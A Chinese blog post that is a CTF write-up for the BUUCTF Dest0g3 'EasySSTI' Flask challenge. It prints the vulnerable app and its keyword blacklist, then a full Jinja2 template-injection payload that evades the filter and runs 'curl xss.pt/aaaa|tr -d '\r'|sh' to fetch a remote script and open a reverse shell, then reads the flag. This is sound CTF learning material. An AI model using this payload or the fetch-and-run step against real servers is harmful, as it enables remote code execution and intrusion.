buuctf:Dest0g3 520迎新赛 web EasySSTI

已于 2022-06-10 09:49:42 修改
阅读量669 收藏 1
点赞数 2
文章标签: flask python 后端
于 2022-06-10 09:29:39 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_29060627/article/details/125215406
版权

源码如下,过滤了不少,过滤不区分大小写:

 [

'\t', ' ', "'", '"', '_', 'getitem', 'request', 'popen', 'cookies', 'args', 'class',

'mro', 'bases', 'subclasses', 'read', 'globals', 'init', '.', 'eval', 'import',

'system', 'builtins', 'os', 'pop', '[', 'form'

]

09:22:26_@out:~# cat /app/app.py
from flask import Flask
from flask import request, render_template_string, render_template

app = Flask(__name__)

def waf(name):
    black_list = ['\t', ' ', "'", '"', '_', 'getitem', 'request', 'popen', 'cookies', 'args', 'class', 'mro', 'bases', 'subclasses', 'read', 'globals', 'init', '.', 'eval', 'import', 'system', 'builtins', 'os', 'pop', '[', 'form']
    for black in black_list:
        if black in name.lower():
            name = black + " in blacklist"
            break
    return name


@app.route("/")
def index():
    return render_template("index.html")


@app.route("/login", methods=['POST'])
def login():
    username = request.form.get('username')
    template = '''
    {%% block body %%}
        <div class="center-content error">
            <h1>Hello</h1>
            <h3>%s</h3>
        </div>
    {%% endblock %%}
    ''' % (waf(username))
    return render_template_string(template)

if __name__ == "__main__":
    app.run(host='0.0.0.0', port=8080)
09:22:41_@out:~#

payload:

POST /login HTTP/1.1
Host: xxx.node4.buuoj.cn:81
Content-Length: xxxx
Content-Type: application/x-www-form-urlencoded
Connection: close

username={%set%0crdea=dict(re=a,ad=a)|join%}{%set%0cpone=dict(po=a,p=a,e=a,n=a)|join%}{%set%0cget=dict(get=a)|join%}{%set%0cso=dict(o=a,s=a)|join%}{%set%0copp=dict(po=a,p=a)|join%}{%set%0cindex=dict(index=a)|join%}{%set%0cn=dict(n=a)|join%}{%set%0cu=dict(u=a)|join%}{%set%0cthree=(lipsum|string|list)|attr(index)(n)%}{%set%0ctwo=(lipsum|string|list)|attr(index)(u)%}{%set%0cone=three-two%}{%set%0cfive=three%2btwo%}{%set%0csix=three*two%}{%set%0cfou=five-one%}{%set%0cnine=three*three%}{%set%0cunderline=(lipsum|string|list)|attr(opp)(two*nine)%}{%set%0cgbl=(underline,underline,dict(glob=a,als=a)|join,underline,underline)|join%}{%set%0cspace=(lipsum|string|list)|attr(opp)(nine)%}{%set%0cc=dict(chr=a)|join%}{%set%0cgetIT=(underline,underline,dict(getit=a,em=a)|join,underline,underline)|join%}{%set%0cbul=(underline,underline,dict(builtin=a,s=a)|join,underline,underline)|join%}{%set%0cbuii=lipsum|attr(gbl)|attr(getIT)(bul)%}{%set%0cshiz=five*nine%}{%set%0cjian=buii|attr(get)(c)(shiz)%}{%set%0cshuxian=buii|attr(get)(c)(five*five*five-one)%}{%set%0cxiangang=buii|attr(get)(c)(shiz%2btwo)%}{%set%0cfanxian=buii|attr(get)(c)(two*shiz%2btwo)%}{%set%0cdot=buii|attr(get)(c)(shiz%2bone)%}{%set%0cyinghao=buii|attr(get)(c)(shiz-six)%}{%set%0caa=dict(curl=a)|join%}{%set%0cab=dict(xss=a)|join%}{%set%0cpt=dict(pt=a)|join%}{%set%0caaaa=dict(aaaa=a)|join%}{%set%0ctr=dict(tr=a)|join%}{%set%0cd=dict(d=a)|join%}{%set%0cr=dict(r=a)|join%}{%set%0csh=dict(sh=a)|join%}{%set%0ccmd=(aa,space,ab,dot,pt,xc,xiangang,aaaa,shuxian,tr,space,jian,d,space,yinghao,fanxian,r,yinghao,shuxian,sh)|join%}{{cmd}}{{lipsum|attr(gbl)|attr(get)(so)|attr(pone)(cmd)|attr(rdea)()}}&password=2

     

   <div class="center-content error">
            <h1>Hello</h1>
            <h3>curl xss.pt/aaaa|tr -d '\r'|sh</h3>
        </div>

反弹成功后,查看flag:

09:29:08_@out:~# set|grep FLAG
FLAG='Dest0g3{06237dfa-6a6e-4ab3-8309-e7688723c4c2}'
09:29:16_@out:~# cat /flag
Dest0g3{06237dfa-6a6e-4ab3-8309-e7688723c4c2}
09:29:20_@out:~#

安河桥北2025
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
[护网杯 2018]easy_tornado(SSTI服务器端模板注入)
weixin_45253573的博客
11-12 648
tornado Tornado是一种 Web 服务器软件的开源版本。Tornado 和主流Web 服务器框架(包括大多数 Python 的框架)有着明显的区别:它是非阻塞式服务器,而且速度相当快。 可以考虑服务器端模板注入 参考SSTI完全学习 SSTI也是获取了一个输入,然后再后端的渲染处理上进行了语句的拼接,然后执行,SSTI利用的是现在的网站模板引擎,主要针对python、php、java的一些网站处理框架,比如Python的jinja2 mako tornado django,php的smarty
UNCTF2022-Web
v2ish1yan的博客
11-21 858
unctf2022的所有webwp
新版攻防世界easy_web-web进阶ssti绕过(太湖杯)
yuanxu8877的博客
11-29 1763
新版攻防世界easy_web-web进阶ssti绕过(太湖杯)
Dest0g3 520迎新部分WP_v6 = 247;(1)
最新发布
2401_84520457的博客
05-16 350
这个方向初期比较容易入门一些,掌握一些基本技术,拿起各种现成的工具就可以开黑了。当我学到一定基础,有自己的理解能力的时候,会去阅读一些前辈整理的书籍或者手写的笔记资料,这些笔记详细记载了他们对一些技术点的理解,这些理解是比较独到,可以学到不一样的思路。网安所有方向的技术点做的整理,形成各个领域的知识点汇总,它的用处就在于,你可以按照上面的知识点去找对应的学习资源,保证自己学得较为全面。观看零基础学习视频,看视频学习是最快捷也是最有效果的方式,跟着视频中老师的思路,从基础到深入,还是很容易入门的。
Dest0g3 520迎新
qq_53263789的博客
06-17 2327
Dest0g3 520迎新
Dest0g3 520迎新 writeup by 树木
JEWSWS的博客
05-29 3553
信息 用户名:树木敲阔爱 类型:分榜前三 排名:25 MISC Welcome to fxxking DestCTF 关注微信公众号,得到flag Dest0g3{W31c0m3_t0_DestCTF2022!} Pngenius 题目是一张PNG图片,很难不让人联想到隐写术,我们使用stegsolve打开 在R0G0B0发现了Password for zip,猜测图片包含ZIP,使用foremost进行分解 分解后发现有密码,使用刚刚解出来的密码解压,得到flag
CTF真题-Dest0g3CTF2022招新
06-01
CTF真题-Dest0g3CTF2022招新,来自BUUCTF
Dest0g3-Java部分1
08-03
Dest0g3-Java部分1
oracle数据库设置db_recovery_file_dest_size参数为0
11-02
当你设置了归档路径,并且不希望使用闪回区域来存储归档日志时,可以将`db_recovery_file_dest_size`设置为0,这样Oracle就不会在这个位置创建或存储任何恢复文件。 设置`db_recovery_file_dest_size`为0的步骤如下...
PxtoneJS:在Web Audio API中播放Pxtone Collage文件
05-02
Web Audio API中播放文件。 演示版 * JavaScript用ES6编写,并使用Babel以ES5代码进行编译和执行。请注意,如果将代码原样移至浏览器,则可能无法使用。 安装并要求 和从Pxtone.js和pxtnDecoder.js保存到适当的...
gulp-multi-dest:就像gulp dest一样,但支持多个输出路径
02-03
就像gulp dest一样,但是支持多个输出路径 安装 npm install gulp-multi-dest --save-dev 用法 var gulp = require('gulp'); var multiDest = require('gulp-multi-dest'); var destOptions = { mode: 0755 }; ...
Dest0g3 520迎新 个人复现Writeup
m0_61596829的博客
06-01 1526
Dest0g3 520迎新 Dest0g3首次招新啦! Dest0g3 Team现逐步发展到各大高校及安全公司均有成员分布,在过去的半年里先后取得L3HCTF第十、SCTF第六及SUSCTF第四的优异成绩。 首届Dest0g3 520迎新更加注重CTFer的基础知识面掌握程度,由易到难,适合各学习阶段选手参加,纯萌新水准。 Dest0g3期待更多新生力量的加入,如有意向请在后提交wp与简历,或联系@Dest0g3 Team (QQ:1115230222) 比时间:2022.5.20 10:
Dest0g3 520迎新 | root 新生
qq_32284207的博客
06-01 750
题解 费马分解 babyAES 题目 题解 ezStream 题目 题解 爆破求seed2 求flag ezDLP 题解 sage离散对数 Mr.Doctor 题目 题解 seed1、seed2 seed flag Bag 题目 题解 学习参考 学习参考 FourThousandRSA 题目 题解 NSSCTF原题,脚本小子🤔(事后具体复现) misc EasyEncode 爆破压缩包密码100861 摩斯码 hex py print() url base6
[WP]第五届XMan选拔web
xiongshivigor的博客
08-11 365
第五届XMan选拔 本次比一共三道web,一道签到题就不用说了,另外两道貌似也都不是很难的题,但是确实水个人平太菜,没都做做出来,还是逐步积累经验吧 easyphp <?php error_reporting(0); highlight_file(__FILE__); class XMAN{ public $class; public $para; public $check; public function __construct() {
[Dest0g3 520迎新] 不会的部分 The correct flag,emma,Bag
weixin_52640415的博客
06-01 421
Dest0g3 520迎新
BUUCTF_ACTF2020新生_web
qq_45628145的博客
05-03 867
Include 进入题目,有一个链接tips,点进去 根据题目名字和这个file=flag.php就知道是文件包含题了,用php伪协议读取flag.php的内容 payload:file=php://filter/read=convert.base64-encode/resource=flag.php 对得到的内容进行base64解码,得到flag Exec 进入题目,是一个有ping功能...
BUUCTF--[ACTF新生2020]easyre
Hk_Mayfly的博客
04-09 3913
测试文件:https://www.lanzous.com/ib515vi 脱壳 获取到信息 32位文件 upx加密 代码分析 1 int __cdecl main(int argc, const char **argv, const char **envp) 2 { 3 char v4; // [esp+12h] [ebp-2Eh] 4 char v5;...
设计一个函数将一个字符串拼接到另一个字符串的末尾 char* mystrcat(char *dest, const char *src); 其中:dest为目标字符串 src为源字符串 如: dest是"mayi" src是"software" 拼接后打印"mayisoftware"
05-25
先找到dest字符串的末尾,然后将src字符串中的字符一个一个复制到dest字符串的末尾,直到src字符串的结束符'\0'。最后返回dest字符串的首地址。 以下是代码实现: ```c #include char* mystrcat(char *dest, ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值